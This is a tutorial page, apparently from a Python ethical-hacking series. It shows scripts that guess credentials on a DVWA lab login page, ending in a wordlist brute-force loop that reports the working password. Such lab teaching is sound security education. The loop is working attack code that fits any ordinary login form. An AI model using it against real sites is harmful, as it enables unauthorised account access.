Guessing Login Information on Login Pages

Our target website: http://10.0.0.45/dvwa/login.php

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"

data_dict = {"username": "dfdfddfd", "password": "", "Login": "submit"}

response = requests.post(target_url, data = data_dict)

print(response.content.decode())

Execute the Python Script.

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"

data_dict = {"username": "admin", "password": "password", "Login": "submit"}

response = requests.post(target_url, data = data_dict)

print(response.content.decode())

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"

data_dict = {"username": "admin", "password": "", "Login": "submit"}

with open("password.list", "r") as wordlist_file:

    for line in wordlist_file:

        word = line.strip()

        data_dict["password"] = word

        response = requests.post(target_url, data=data_dict)

        if "Login failed" not in response.content.decode():

            print("[+] Got the password --> " + word)

            exit()

print("[+] Reached end of line.")

Python Ethical Hacking - WEB PENETRATION TESTING(5)的更多相关文章

  1. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  2. Python Ethical Hacking - WEB PENETRATION TESTING(2)

     CRAWING DIRECTORIES Directories/folders inside the web root. Can contain files or other directories ...

  3. Python Ethical Hacking - WEB PENETRATION TESTING(4)

    CRAWING SPIDER Goal -> Recursively list all links starting from a base URL. 1. Read page HTML. 2. ...

  4. Python Ethical Hacking - WEB PENETRATION TESTING(3)

    CRAWLING SUMMARY Our crawler so far can guess: Subdomains. Directories. Files. Advantages: ->Disc ...

  5. Ethical Hacking - Web Penetration Testing(13)

    OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to ...

  6. Ethical Hacking - Web Penetration Testing(8)

    SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(userna ...

  7. Ethical Hacking - Web Penetration Testing(10)

    SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...

  8. Ethical Hacking - Web Penetration Testing(6)

    REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ...

  9. Ethical Hacking - Web Penetration Testing(4)

    CODE EXECUTION VULNS Allows an attacker to execute OS commands. Windows or Linux commands. Can be us ...

随机推荐

  1. Jmeter 测试接口

    创建线程组 添加HTTP请求 查看结果树

  2. mac下创建安卓应用 hello-world

    教程 https://www.jianshu.com/p/bf77cb5ce70b 需要注意的地方 jdk目录查找 jdk目录拷贝到tool目录下面(jdk可以拷贝,没有其他牵扯) https://w ...

  3. python R语言 入门常见指令

    环境是windows R语言安装包 install.packages("magrittr")

  4. P5676 [GZOI2017]小z玩游戏【Tarjan】

    小z玩游戏 Tarjan算是板子题吧,但是要稍微做一些修改,建边需要多考虑,建立"虚点". 题目描述 小 z 很无聊. 小 z 要玩游戏. 小 z 有\(N\)个新游戏,第\(i\ ...

  5. MySQL 8.0 主从同步

    一.简介 一台服务器充当主数据库服务器,另一台或多台服务器充当从数据库服务器,主服务器中的数据自动复制到从服务器之中.MySQL主从复制的基础是主服务器对数据库修改记录二进制日志,从服务器通过主服务器 ...

  6. 【Xamarin.Forms 3】页面类型

    系列目录 微信 1.[Xamarin.Forms 1]App的创建与运行 2.[Xamarin.Forms 2]App基础知识与App启动 知乎 1.[Xamarin.Forms 1]App的创建与运 ...

  7. python用类的方式创建线程---自创建类

    用类的方式创建线程---自创建类 import threadingimport time class MyThread(threading.Thread):#自建MyThread类继承threadin ...

  8. 服务消费者(Feign-上)

    上一篇文章,讲述了Ribbon去做负载请求的服务消费者,本章讲述声明性REST客户端:Feign的简单使用方式 - Feign简介 Feign是一个声明式的Web服务客户端.这使得Web服务客户端的写 ...

  9. (私人收藏)2019科协WER解决方案

    2019科协WER解决方案 含地图,解决程序,详细规则,搭建方案EV3;乐高;机器人比赛;能力风暴;WER https://pan.baidu.com/s/16sdFmM49bPijYw55i8ox1 ...

  10. C语言学习笔记——特别篇(VScode安装使用)

    B站有同步教学视频 参考博文: https://www.cnblogs.com/czlhxm/p/11794743.html 注意事项: 请在英文目录下运行!!! VScode下载链接: https: ...